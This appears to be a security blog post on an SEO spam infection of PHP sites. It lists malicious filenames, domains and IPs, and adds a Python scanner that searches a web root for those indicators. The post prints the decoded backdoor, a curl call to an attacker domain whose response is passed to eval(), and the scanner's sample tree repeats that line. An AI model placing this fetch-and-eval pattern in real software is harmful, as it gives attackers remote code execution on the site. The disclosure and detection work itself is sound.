Recently we noticed several SEO spam injections following the same pattern, starting with a list of encoded malicious files.
If you notice any of these inside your root folder, it means your site is infected: auto_seo.php, accesson.php, wikindex.php, old-index.php, 3index.php. Moreover, any addon sites hosted on the same account will be affected by cross-site contamination.
To perform a cleanup, you may follow the steps described here:
Try our Free site check.
After having a closer look, I managed to decode the following strings.
$ch = curl_init('http://banksstop.tech/'.$_GET['f']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
eval('?>'.$result);
index.php files are being injected with malware, and hidden .ico files are also randomly installed.
Malicious domains: 28ioh.sgate.xyz, banksstop.tech, hollywoodregistration.xyz.
Malicious IPs: 18.104.22.168, 22.214.171.124 (WholeSale Internet, Inc.).
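A small scanner built from the indicators listed in this post, added here as an example (it is not the author's tooling). It walks a web root and reports the named files, hidden .ico files, and PHP files that reference the listed domains or pass a curl response to eval(). The function names, the regex heuristic and the sample tree in demo() are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Indicators copied from the post above.
BAD_NAMES = {"auto_seo.php", "accesson.php", "wikindex.php", "old-index.php", "3index.php"}
BAD_DOMAINS = (b"28ioh.sgate.xyz", b"banksstop.tech", b"hollywoodregistration.xyz")
# Heuristic (assumption): curl_exec() output reaching eval() shortly afterwards,
# the shape of the decoded string. Still-encoded copies will not match it.
REMOTE_EVAL = re.compile(rb"curl_exec\s*\(.{0,400}?\beval\s*\(", re.S)

def scan(root):
    """Walk root and return a sorted list of (relative_path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            lower = name.lower()
            if lower in BAD_NAMES:  # checked at any depth to cover addon sites
                findings.append((rel, "known filename"))
            if lower.startswith(".") and lower.endswith(".ico"):
                findings.append((rel, "hidden .ico"))
            if lower.endswith(".php"):
                try:
                    with open(path, "rb") as fh:
                        data = fh.read(2 << 20)  # cap the read at 2 MiB per file
                except OSError:
                    continue  # unreadable file: skip rather than abort the scan
                if any(d in data for d in BAD_DOMAINS):
                    findings.append((rel, "listed domain"))
                if REMOTE_EVAL.search(data):
                    findings.append((rel, "remote fetch into eval"))
    return sorted(findings)

def demo():
    # Constructed sample tree: one injected index.php, one named file,
    # one hidden .ico inside an addon site, and a normal favicon.
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "addon/img"))
        samples = {
            "index.php": b"<?php $ch = curl_init('http://banksstop.tech/'.$_GET['f']);"
                         b"$r = curl_exec($ch); eval('?>'.$r);",
            "wikindex.php": b"<?php /* encoded body omitted */",
            "addon/img/.a1b2c3.ico": b"\x00\x00\x01\x00",
            "favicon.ico": b"\x00\x00\x01\x00",
        }
        for rel, body in samples.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(body)
        return scan(root)
```

Point scan() at the account's home directory rather than a single site's folder so that addon sites are covered in the same pass.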